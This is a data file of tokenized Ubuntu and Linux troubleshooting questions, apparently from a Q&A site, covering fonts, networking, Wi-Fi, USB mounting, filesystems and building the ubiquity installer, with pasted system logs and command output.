22392	how do i install google translate desktop ?	i 've downloaded the package but as i 'm trying to open it i get this message : archive : /home/agnes/downloads/ggtranslate.exe [ /home/agnes/downloads/ggtranslate.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/agnes/downloads/ggtranslate.exe or /home/agnes/downloads/ggtranslate.exe.zip , and can not find /home/agnes/downloads/ggtranslate.exe.zip , period .
22395	how can i enable font smoothing when i connect to a windows server with terminal services client ?	when i fire up remote desktop on windows and connect to my server ( windows server 2008 ) , the fonts look pretty smooth . i just installed ubuntu 10.10 yesterday and when i use rdesktop to connect the fonts look terrible . i 've looked at all the settings but had no luck . maybe there 's some secret switch , or do i need to use a different client ?
22397	how can i find exact delay in badly synced audio and video streams in a media container ?	while making screencasts i always end up with a file having poorly synced audio and video streams . this is not container specific as this happens with all the formats - ogg , mkv , avi , mp4 etc . i guess this has something to do with ffmpeg . after searching on internet , i found that this can be fixed using itsoffset switch in ffmpeg . i also tested it and it works . but the question is how do i find exact lag between audio and video streams in seconds : milliseconds ? ? i tried ffmpeg -i but it always shows delay to be zero .
22401	better alt+tab for gnome ?	is there any alt+tab module for gnome that make it behave more like it is in windows 7 ? edit : by how it behaves more like windows 7 , i mean when you press alt+tab you can also , when you have those keys pressed in , navigate through the windows with the arrow keys
22402	will ubuntu 11.04 work on my old pc ?	it has an old sis based graphics chip with 64mb memory , there were never 3d drivers for them . ubuntu 10.10 does n't even boot on it and my laptop , a lenovo n200 with intel 9something graphics 128mb so i 'm really worried . broadband prices don ; t come cheap in south africa so the download has to be worth it . i can wait for the shipment but i 've since orderd 10.10 and it has n't come , so i do n't know if i 'm barred from using that service since i 've been sent a disc every release .
22403	.bash_login not executing	i 've put a .bash_login file in my $ home-directory but it does n't execute . i 've also tried .bash_profile but also does n't work . there are also .profile .bash_history .bash_logout any idea ? i 'm using crunchbang 10 statler .
22408	`` $ makeopts '' ignored , why ?	i have defined export makeopts= '' -j4 '' in my ~/.profile file . but when i do a compilation with make , this option is ignored . i 've consulted the gnu make manual but it says nothing about this variable . is it standard or only it works in certain distros ?
22411	mounting thumb drive	i 'm using ubuntu 10.10 netbook edition . i have some data on a thumb drive that i want to put on my computer but when i plug in the thumb drive , nothing happens . i search for the file and it 's not there . /media is empty . how do i mount this thumbrive and make it mount automatically ? output of dmesg . the total output was too large , so i put in what i thought would be relevant : [ 2043.086937 ] wlan0 : associated [ 2523.345076 ] usb 1-3 : new high speed usb device using ehci_hcd and address 3 [ 2523.647942 ] initializing usb mass storage driver ... [ 2523.648585 ] scsi4 : usb-storage 1-3:1.0 [ 2523.649787 ] usbcore : registered new interface driver usb-storage [ 2523.649796 ] usb mass storage support registered . [ 2524.660116 ] scsi 4:0:0:0 : direct-access toshiba transmemory 5.00 pq : 0 ansi : 0 ccs [ 2524.665393 ] sd 4:0:0:0 : attached scsi generic sg1 type 0 [ 2525.902179 ] sd 4:0:0:0 : [ sdb ] 4028416 512-byte logical blocks : ( 2.06 gb/1.92 gib ) [ 2525.902776 ] sd 4:0:0:0 : [ sdb ] write protect is off [ 2525.902787 ] sd 4:0:0:0 : [ sdb ] mode sense : 23 00 00 00 [ 2525.902795 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 2525.906549 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 2525.906570 ] sdb : sdb1 [ 2525.910640 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 2525.910656 ] sd 4:0:0:0 : [ sdb ] attached scsi removable disk [ 2638.233056 ] usb 1-3 : usb disconnect , address 3 [ 2643.460114 ] usb 1-3 : new high speed usb device using ehci_hcd and address 4 [ 2643.598968 ] scsi5 : usb-storage 1-3:1.0 [ 2644.596900 ] scsi 5:0:0:0 : direct-access toshiba transmemory 5.00 pq : 0 ansi : 0 ccs [ 2644.599789 ] sd 5:0:0:0 : attached scsi generic sg1 type 0 [ 2644.819235 ] sd 5:0:0:0 : [ sdb ] 4028416 512-byte logical blocks : ( 2.06 gb/1.92 gib ) [ 2644.819872 ] sd 5:0:0:0 : [ sdb ] write protect is off [ 2644.819884 ] sd 5:0:0:0 : [ sdb ] mode sense : 23 00 00 00 [ 2644.819892 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 2644.825499 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 2644.825533 ] sdb : sdb1 [ 2644.834616 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 2644.834632 ] sd 5:0:0:0 : [ sdb ] attached scsi removable disk [ 2925.444581 ] usb 1-3 : usb disconnect , address 4 [ 3090.808101 ] usb 1-3 : new high speed usb device using ehci_hcd and address 5 [ 3090.945921 ] scsi6 : usb-storage 1-3:1.0 [ 3091.944884 ] scsi 6:0:0:0 : direct-access toshiba transmemory 5.00 pq : 0 ansi : 0 ccs [ 3091.946451 ] sd 6:0:0:0 : attached scsi generic sg1 type 0 [ 3093.224574 ] sd 6:0:0:0 : [ sdb ] 4028416 512-byte logical blocks : ( 2.06 gb/1.92 gib ) [ 3093.225499 ] sd 6:0:0:0 : [ sdb ] write protect is off [ 3093.225517 ] sd 6:0:0:0 : [ sdb ] mode sense : 23 00 00 00 [ 3093.225527 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 3093.229707 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 3093.229762 ] sdb : sdb1 [ 3093.232970 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 3093.232993 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk [ 3134.507536 ] usb 1-3 : usb disconnect , address 5 [ 3139.169115 ] usb 1-1 : new high speed usb device using ehci_hcd and address 6 [ 3139.308938 ] scsi7 : usb-storage 1-1:1.0 [ 3140.308945 ] scsi 7:0:0:0 : direct-access toshiba transmemory 5.00 pq : 0 ansi : 0 ccs [ 3140.310423 ] sd 7:0:0:0 : attached scsi generic sg1 type 0 [ 3140.550352 ] sd 7:0:0:0 : [ sdb ] 4028416 512-byte logical blocks : ( 2.06 gb/1.92 gib ) [ 3140.551040 ] sd 7:0:0:0 : [ sdb ] write protect is off [ 3140.551059 ] sd 7:0:0:0 : [ sdb ] mode sense : 23 00 00 00 [ 3140.551072 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 3140.557789 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 3140.557821 ] sdb : sdb1 [ 3140.564267 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 3140.564279 ] sd 7:0:0:0 : [ sdb ] attached scsi removable disk [ 4639.380928 ] usb 1-1 : usb disconnect , address 6 [ 4749.180094 ] usb 1-3 : new high speed usb device using ehci_hcd and address 7 [ 4749.319077 ] scsi8 : usb-storage 1-3:1.0 [ 4750.316850 ] scsi 8:0:0:0 : direct-access toshiba transmemory 5.00 pq : 0 ansi : 0 ccs [ 4750.319861 ] sd 8:0:0:0 : attached scsi generic sg1 type 0 [ 4752.278001 ] sd 8:0:0:0 : [ sdb ] 4028416 512-byte logical blocks : ( 2.06 gb/1.92 gib ) [ 4752.278603 ] sd 8:0:0:0 : [ sdb ] write protect is off [ 4752.278616 ] sd 8:0:0:0 : [ sdb ] mode sense : 23 00 00 00 [ 4752.278626 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 4752.283289 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 4752.283320 ] sdb : sdb1 [ 4752.289263 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 4752.289286 ] sd 8:0:0:0 : [ sdb ] attached scsi removable disk
22413	how to change gnome-terminal title ?	i have several instances of terminals running in my working environment , what i would like is to set a specific title for each one , in order to have a clear idea what purpose the specific terminal serves i.e . apache , editing_ini , postgres etc ... of course from the command line .
22419	how do i make urxvt render xft fonts ?	i wonder whether there 's a way to make urxvt render xft fonts : urxvt.font : xft : droid sans mono slashed : pixelsize=9 : regular urxvt.boldfont : xft : droid sans mono slashed : pixelsize=9 : bold urxvt.talicfont : xft : droid sans mono slashed : pixelsize=9 : italic urxvt.bolditalicfont : xft : droid sans mono slashed : pixelsize=9 : bold : italic if i try this , i get something like : so it scales pretty bad : ! fonts xft.dpi : 132 xft.antialias : true xft.rgba : rgb xft.hinting : true xft.autohint : true xft.hintstyle : hintfull i 'm not sure whether this is one of the reaons . however i want antialias and that droid . is there any trick here ?
22422	ubuntu machine behind a lan as openvpn server	i am running an ubuntu server with lan ip on which i want to run openvpn server which will provide access to the lan that ubuntu server is in . i will be opening a port on my router through which the ubuntu server will listen on . the network will be 192.168.0.0/255.255.0.0 the ( eth0 ) ip of ubuntu server will be 192.168.9.10 . the lan gateway and dns server will be 192.168.0.1 ( router ) . i have partially worked on it by using this guide . but the openvpn server fails to start , so something is n't right in my conf file . so what settings should i have in my openvpn conf file ?
22429	a simple way to manage configuration of dot files and packages ?	in a few hours i will get my new thinkpad x201t and the first thing that i will do is install ubuntu on it . in the last two months i switched machines quite a lot because i needed to work despite my previous machine which crashed ( a macbook pro 4,1 ) . i even did set up a work environment on a cloud-hosted vm to be able to connect to it from everywhere . now - trying to remove the manual set up of each box - i am looking for ways to configure a system in a scripted way which allows me to change the configuration and replicate it on another box when i need to . this includes tasks such as installing and configuring packages . i already worked a little bit with chef but it 's just too complex for single machines . my dot files already live in a git repository hope there are some of you who already have a solution : )
22435	where can i find a list of daily builds ?	i 'm interested in finding out which ppas have daily builds associated with them so i can be sure i 'm always running the latest software available by these teams . does such a feature exist ?
22437	backspace keyboard shortcut for gtk+	i am using xubuntu and i am looking for a way to bind the backspace key with navigating to the parent directory of the current directory . i read in the thunar documentation faq ( at the bottom ) that thunar shortcuts are standard gtk+ keyboard shortcuts , meaning that there are two ways of setting a keyboard shortcut for `` open parent '' : hovering over the open parent menu option with the mouse pointer and pressing the keyboard shortcut ( after enabling the editable menu accelerators option in settings ) editing $ xdg_config_dirs/thunar/accels.scm the first method did n't work because pressing backspace removes any keyboard shortcut assigned to the option instead of assigning backspace to the option . the second also did n't work but i do n't know why . perhaps the backspace key should be written differently . this is how i tried it : ( gtk_accel_path `` < actions > /thunarwindow/open-parent '' `` < backspace > '' )
22439	lost connectivity after configuring multiple network adapters on separate networks	i am trying to setup an ubuntu hosting server , currently just for development , and the server has two nics , each sitting on a different network . eth0 is on 192.168.200 . * and eth1 is on 192.168.101 . * and each one has a static ip . eth0 is the public facing nic card and eth1 is strictly for internal access to the server . i initially only setup eth0 and added the eth1 card when i needed it . eth0 was working find until i added eth1 , now , ca n't get any connectivity on eth0 unless i pull eth1 out of the box . the configuration on each system is as follows : auto eth0 iface eth0 inet static address 192.168.200.94 netmask 255.255.255.0 network 192.168.200.0 broadcast 192.168.200.255 gateway 192.168.200.253 auto eth1 iface eth1 inet static address 192.168.101.64 netmask 255.255.255.0 network 192.168.101.0 broadcast 192.168.101.255 gateway 192.168.101.254 again eth0 worked fine until i added eth1 . i have seen this happen with windows servers if you have a default gateway setup for both nics , but i am not sure if this works the same on ubuntu . my resolv.conf file looks like so : nameserver 192.168.101.59 nameserver 192.168.101.58 domain domain.local search domain.local per request here is the routing table 192.168.101.0 * 255.255.255.0 u 0 0 0 eth1 192.168.200.0 * 255.255.255.0 u 0 0 0 eth0 default 192.168.101.254 0.0.0.0 ug 100 0 0 eth1 default 192.168.200.253 0.0.0.0 ug 100 0 0 eth0
22440	why ca n't i connect to a cisco wireless access point ?	i 'm running a lucid netbook remix on my dell inspiron 600m and i was not able to connect to the wireless network at the hacker dojo in mountain view yesterday . there were plenty of other people on the network - ms , mac , and linux boxes - but my laptop would never get an ip address . i can connect to my home network , which is open , and i 've never had a problem connecting at the coffee shop , which uses wpa . the hacker dojo is running wpa and we checked the password a number of times but got no love . any ideas would be greatly appreciated . additional info : $ iwlist eth1 scan eth1 scan completed : cell 01 - address : ec : c8:82 : fa:63:92 essid : '' hackerdojo-gwifi '' protocol : ieee 802.11g mode : master frequency:2.412 ghz ( channel 1 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s quality:62 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk extra : last beacon : 280ms ago cell 02 - address : 00:18:4d:24:08:61 essid : '' green zone '' protocol : ieee 802.11bg mode : master frequency:2.417 ghz ( channel 2 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s quality:23 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk extra : last beacon : 11516ms ago cell 03 - address : 08:17:35:32:6e:13 essid : '' \x00 '' protocol : ieee 802.11g mode : master frequency:2.437 ghz ( channel 6 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s quality:71 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk extra : last beacon : 2760ms ago cell 04 - address : ec : c8:82 : fa:63:90 essid : '' hackerdojo '' protocol : ieee 802.11g mode : master frequency:2.412 ghz ( channel 1 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s quality:61 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk extra : last beacon : 772ms ago cell 05 - address : 08:17:35:32:6e:11 essid : '' hackerdojo-presenter '' protocol : ieee 802.11g mode : master frequency:2.437 ghz ( channel 6 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s quality:65 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk extra : last beacon : 3308ms ago cell 06 - address : 08:17:35:32:7e:31 essid : '' hackerdojo-presenter '' protocol : ieee 802.11g mode : master frequency:2.462 ghz ( channel 11 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s quality:88 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk extra : last beacon : 1668ms ago cell 07 - address : 38 : e7 : d8:01:46:1e essid : '' jws_incredible '' protocol : ieee 802.11bg mode : master frequency:2.412 ghz ( channel 1 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 500 kb/s ; 54 mb/s quality:31 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk extra : last beacon : 2848ms ago cell 08 - address : 08:17:35:32:6e:10 essid : '' hackerdojo '' protocol : ieee 802.11g mode : master frequency:2.437 ghz ( channel 6 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s quality:67 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk extra : last beacon : 7848ms ago cell 09 - address : 08:17:35:32:7e:30 essid : '' hackerdojo '' protocol : ieee 802.11g mode : master frequency:2.462 ghz ( channel 11 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s quality:85 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk extra : last beacon : 8300ms ago cell 10 - address : 08:17:35:32:6e:12 essid : '' hackerdojo-gwifi '' protocol : ieee 802.11g mode : master frequency:2.437 ghz ( channel 6 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s quality:68 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk extra : last beacon : 232ms ago cell 11 - address : 08:17:35:32:7e:32 essid : '' hackerdojo-gwifi '' protocol : ieee 802.11g mode : master frequency:2.462 ghz ( channel 11 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s quality:86 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk extra : last beacon : 168ms ago cell 12 - address : ec : c8:82 : fa:63:91 essid : '' hackerdojo-presenter '' protocol : ieee 802.11g mode : master frequency:2.412 ghz ( channel 1 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s quality:62 signal level:0 noise level:0 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk extra : last beacon : 7408ms ago $ iwconfig eth1 eth1 unassociated essid : '' hackerdojo-gwifi '' nickname : '' ipw2100 '' mode : managed channel=0 access point : not-associated bit rate:0 kb/s tx-power:16 dbm retry short limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0
22442	wifi signal constantly going down and up	ubuntu 10.10 wifi router tp-link td-w8901g after connecting to wifi network , net do not work ( tested with ping 8.8.8.8 ) . after some time ( usually seconds ) ping go through . then after some time go still . after some extra time works again . and this `` up and down '' repeats constantly . netbook ( asus n71 ) is placed 10cm from wifi , on win7 there is no such problem . and it showed up only recently ( ~2 months ago ) . how to repair it ? how to diagnose it ?
22443	why has n't my launchpad karma changed in nearly a week ?	my launchpad karma has neither increased nor decreased in many days now , despite my being active on the site in that time . i 've checked the launchpad blog and there 's no mention of any ongoing maintenance that would affect the functionality of the site . does anyone know why this might be the case ?
22448	not all ttf fonts visible from the ( sun ) jdk	i wanted to use monaco.ttf with intellij . unfortunately it does n't show up . i also noticed that the monaco font does n't appear in the list of fonts got from awt : java.awt.graphicsenvironment.getlocalgraphicsenvironment ( ) .getavailablefontfamilynames ( ) i installed monaco.ttf in /usr/share/fonts/truetype/osx i also tried to copy it in /usr/lib/jvm/java-6-sun/jre/lib/fonts and even tried to manually update the /usr/lib/jvm/java-6-sun/jre/lib/fonts/fonts.dir file i restarted the jvm at each try , but the fonts is not visible from the sun jdk . all other applications see that font ( even eclipse , which is in java but uses the swt library ) does anybody know how to make jdk see additional fonts ?
22452	i need to manually parition a hd to install	i have a 50 gb partition that needs to be manually paritioned , how should i do this ? i need to know what partitions to make , and what size they should be .
22454	where to check the updated packages or new packages list in launchpad ?	where to check the updated packages or new packages list in launchpad
22456	jfs vs. ext4 vs. ext3	i 've got a 2tb external hd on which i save valuable data . so far i 'm using ntfs as my file system , but i find it quite slow because i 've got lots of files there . ( 700gb of videos , 20gb of music , etc . ) i want to encrypt some of the files ( personal ) and not the whole partition , and i would like the partition to run smoothly and not as laggy as now . i read about jfs and ext4 and ext3 but each of them has got pros and cons . can someone explain to me which one is the best for my needs ?
22462	broadcom bcm4313 takes ages to connect	i 'm having issues with my broadcom bcm4313 wireless adapter . everything works just fine when connected ( with additional drivers & connman ) , but it takes about 5 minutes to connect to my network when i just started my computer ! when resuming from hibernation it goes very quick though , so just when i boot my pc it 's taking forever ... this is what i found in the dmesg output : [ 16.778057 ] eth1 : broadcom bcm4727 802.11 hybrid wireless controller 5.60.48.36 [ 16.808768 ] type=1400 audit ( 1295859939.727:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient3 '' pid=833 comm= '' apparmor_parser '' [ 16.808815 ] type=1400 audit ( 1295859939.727:3 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient3 '' pid=799 comm= '' apparmor_parser '' [ 16.808825 ] type=1400 audit ( 1295859939.727:4 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient3 '' pid=826 comm= '' apparmor_parser '' [ 16.809367 ] type=1400 audit ( 1295859939.727:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=833 comm= '' apparmor_parser '' [ 16.809415 ] type=1400 audit ( 1295859939.727:6 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=799 comm= '' apparmor_parser '' [ 16.809435 ] type=1400 audit ( 1295859939.727:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=826 comm= '' apparmor_parser '' [ 16.809705 ] type=1400 audit ( 1295859939.727:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=833 comm= '' apparmor_parser '' [ 16.809755 ] type=1400 audit ( 1295859939.727:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=799 comm= '' apparmor_parser '' [ 16.809769 ] type=1400 audit ( 1295859939.727:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=826 comm= '' apparmor_parser '' [ 16.844083 ] alloc irq_desc for 22 on node -1 [ 16.844087 ] alloc kstat_irqs on node -1 any ideas how come ? thanks in advance !
22466	how to build and test ubiquity	i 've written a patch for ubiquity and i 'd like to test it before i submit it , but i 'm not sure how to go about this given the nature of ubiquity ( only used during installation ) . is there a way i can build and run it on my own system , or would i have to pull the entire ubuntu source code and integrate my patch into that , then run a test installation ?
22469	cross platform file/disk encryption	anyone know any program that works in ubuntu to encrypt files/disk ? i 'm looking for something that will ask you for a password to open files when you plug in the pendrive/portable hard disk . if possible , is there any program that can run in both ubuntu and windows 7 ?
22480	error when running ./configure on ubiquity source	i have added a patch to the ubiquity source and am attempting to build and install the package to test it , however i get the following error when i execute ./configure , checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for panel ... yes checking for cheese ... no configure : error : package requirements ( glib-2.0 gtk+-2.0 > = 2.10.0 gobject-2.0 pygobject-2.0 cheese-gtk ) were not met : no package 'cheese-gtk ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables cheese_cflags and cheese_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . this is a truncated version - there 's far more that came before this , but this is where the error occurred . i have no idea where to start with this . i tried checking man pkg-config , but that did n't really help , except i now have a vague understanding of what pkg-config is supposed to do . none of the packages listed as being missing can be found by apt-get . i got cheese ( different from cheese-gtk apparently ) installed , but that has n't helped . i would really appreciate some help troubleshooting this .
22486	why does unity hide the menubar ?	why does unity hide the menubars by default , instead of showing them in the free space across the panel ?
22490	persistent liveusb fails to install nvidia drivers	i have live ubuntu ( tried also mint and kubuntu , same effect ) on a usb stick with persistence enabled . my laptop is however very noisy ( vga still on max ? ) . i solved this problem before back with mint 7 gloria like : sudo nvidia-xconfig ctrl+alt+backspace ( restart xserver ) . vga then behaved reasonably . i can not reproduce these steps anymore with latest ubuntu/kubuntu/mint . can the problem be that i 'm on a liveusb ? is it normal , then when selecting `` additional drivers '' for nvidia they always fail to install ( those proprietary ) ?
22492	troubles with acrobat reader within firefox ?	i just built a new machine and installing acrobat was last step in process . am running thinkpad x210 with 10.10 64-bit . i 've always been able to reliably open pdfs inline from the web ; however , when i launch a pdf , the main firefox panel goes either white , completely black , or white with black diaganol streaks . perhaps this is video related ... here 's what i have chipset wise vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) i 'm certainly not wed to acrobat , but i do want to have firefox with inline pdfs from web .
22494	how to change wallpaper on 1920x1080 with compiz effects enabled ?	i am able to enjoy all of the compiz desktop effects with screen resolution set lower than native , which is 1920x1080 . as soon as i switch to this resolution , when i go to change a wallpaper , the screen turns to colored lines or freezes . all other effects work fine . it is only the changing of wallpaper that causes this . i have read that the ati xpress 200 gfx card is no longer supported by linux , but there must be a way to rectify this one problem . thanks in advance .
22498	how to auto-boot into text mode ?	how to configure my ubuntu 10.10 desktop ( maverick ) to start in a terminal like mode ? i do n't want any graphics . i ca n't get rid of gdm . how should i disable only graphical interface of my ubuntu ? i want it to start only in text mode , but i want that everything else would start-up . i ca n't use recovery mode , because i want that it would run in text mode all the time even after restarts .
22500	problem running ubiquity when compiled from source	i 've written a patch for ubiquity that i 'm try to test . i 've modified the ubiquity source and successfully run ./configure , make and sudo make install , however i 'm having problems running it . when i enter ubiquity into the terminal , i am prompted to install it from the repositories . i have searched the /etc/ubiquity directory , but all there is there is a log file generated during the installation . how should i get ubiquity running ? the output of sudo make install is attached below . making install in desktop make [ 1 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/desktop' make [ 2 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/desktop' make [ 2 ] : nothing to be done for `install-exec-am ' . test -z `` /usr/local/share/applications '' || /bin/mkdir -p `` /usr/local/share/applications '' /usr/bin/install -c -m 644 oem-config-prepare-gtk.desktop oem-config-prepare-kde.desktop ubiquity-gtkui.desktop ubiquity-kdeui.desktop '/usr/local/share/applications' make [ 2 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/desktop' make [ 1 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/desktop' making install in pixmaps make [ 1 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/pixmaps' make [ 2 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/pixmaps' make [ 2 ] : nothing to be done for `install-exec-am ' . test -z `` /usr/local/share/ubiquity/pixmaps '' || /bin/mkdir -p `` /usr/local/share/ubiquity/pixmaps '' /usr/bin/install -c -m 644 world_map-960.png zoom-in.png '/usr/local/share/ubiquity/pixmaps' make [ 2 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/pixmaps' make [ 1 ] : leaving directory `/home/notgary/projects/bzr-branches/ubiquity/pixmaps' making install in po make [ 1 ] : entering directory `/home/notgary/projects/bzr-branches/ubiquity/po' linguas= '' af am an ar ast az be bg bn br bs ca cs csb da de el eo es et eu fa fi fr fy ga gl gu he hi hr hu hy id is it ja ka kk ko ku lb lt lv mk ms nb ne nl nn no oc pl pt pt_br ro ru sd sk sl sq sr sv ta tg th tl tr uk vi zh_cn zh_hk zh_tw `` ; \ for lang in $ linguas ; do \ dir=/usr/local/share/locale/ $ lang/lc_messages ; \ /bin/bash /home/notgary/projects/bzr-branches/ubiquity/build/install-sh -d $ dir ; \ if test -r $ lang.gmo ; then \ /usr/bin/install -c -m 644 $ lang.gmo $ dir/ubiquity.mo ; \ echo `` installing $ lang.gmo as $ dir/ubiquity.mo '' ; \ else \ /usr/bin/install -c -m 644 ./ $ lang.gmo $ dir/ubiquity.mo ; \ echo `` installing 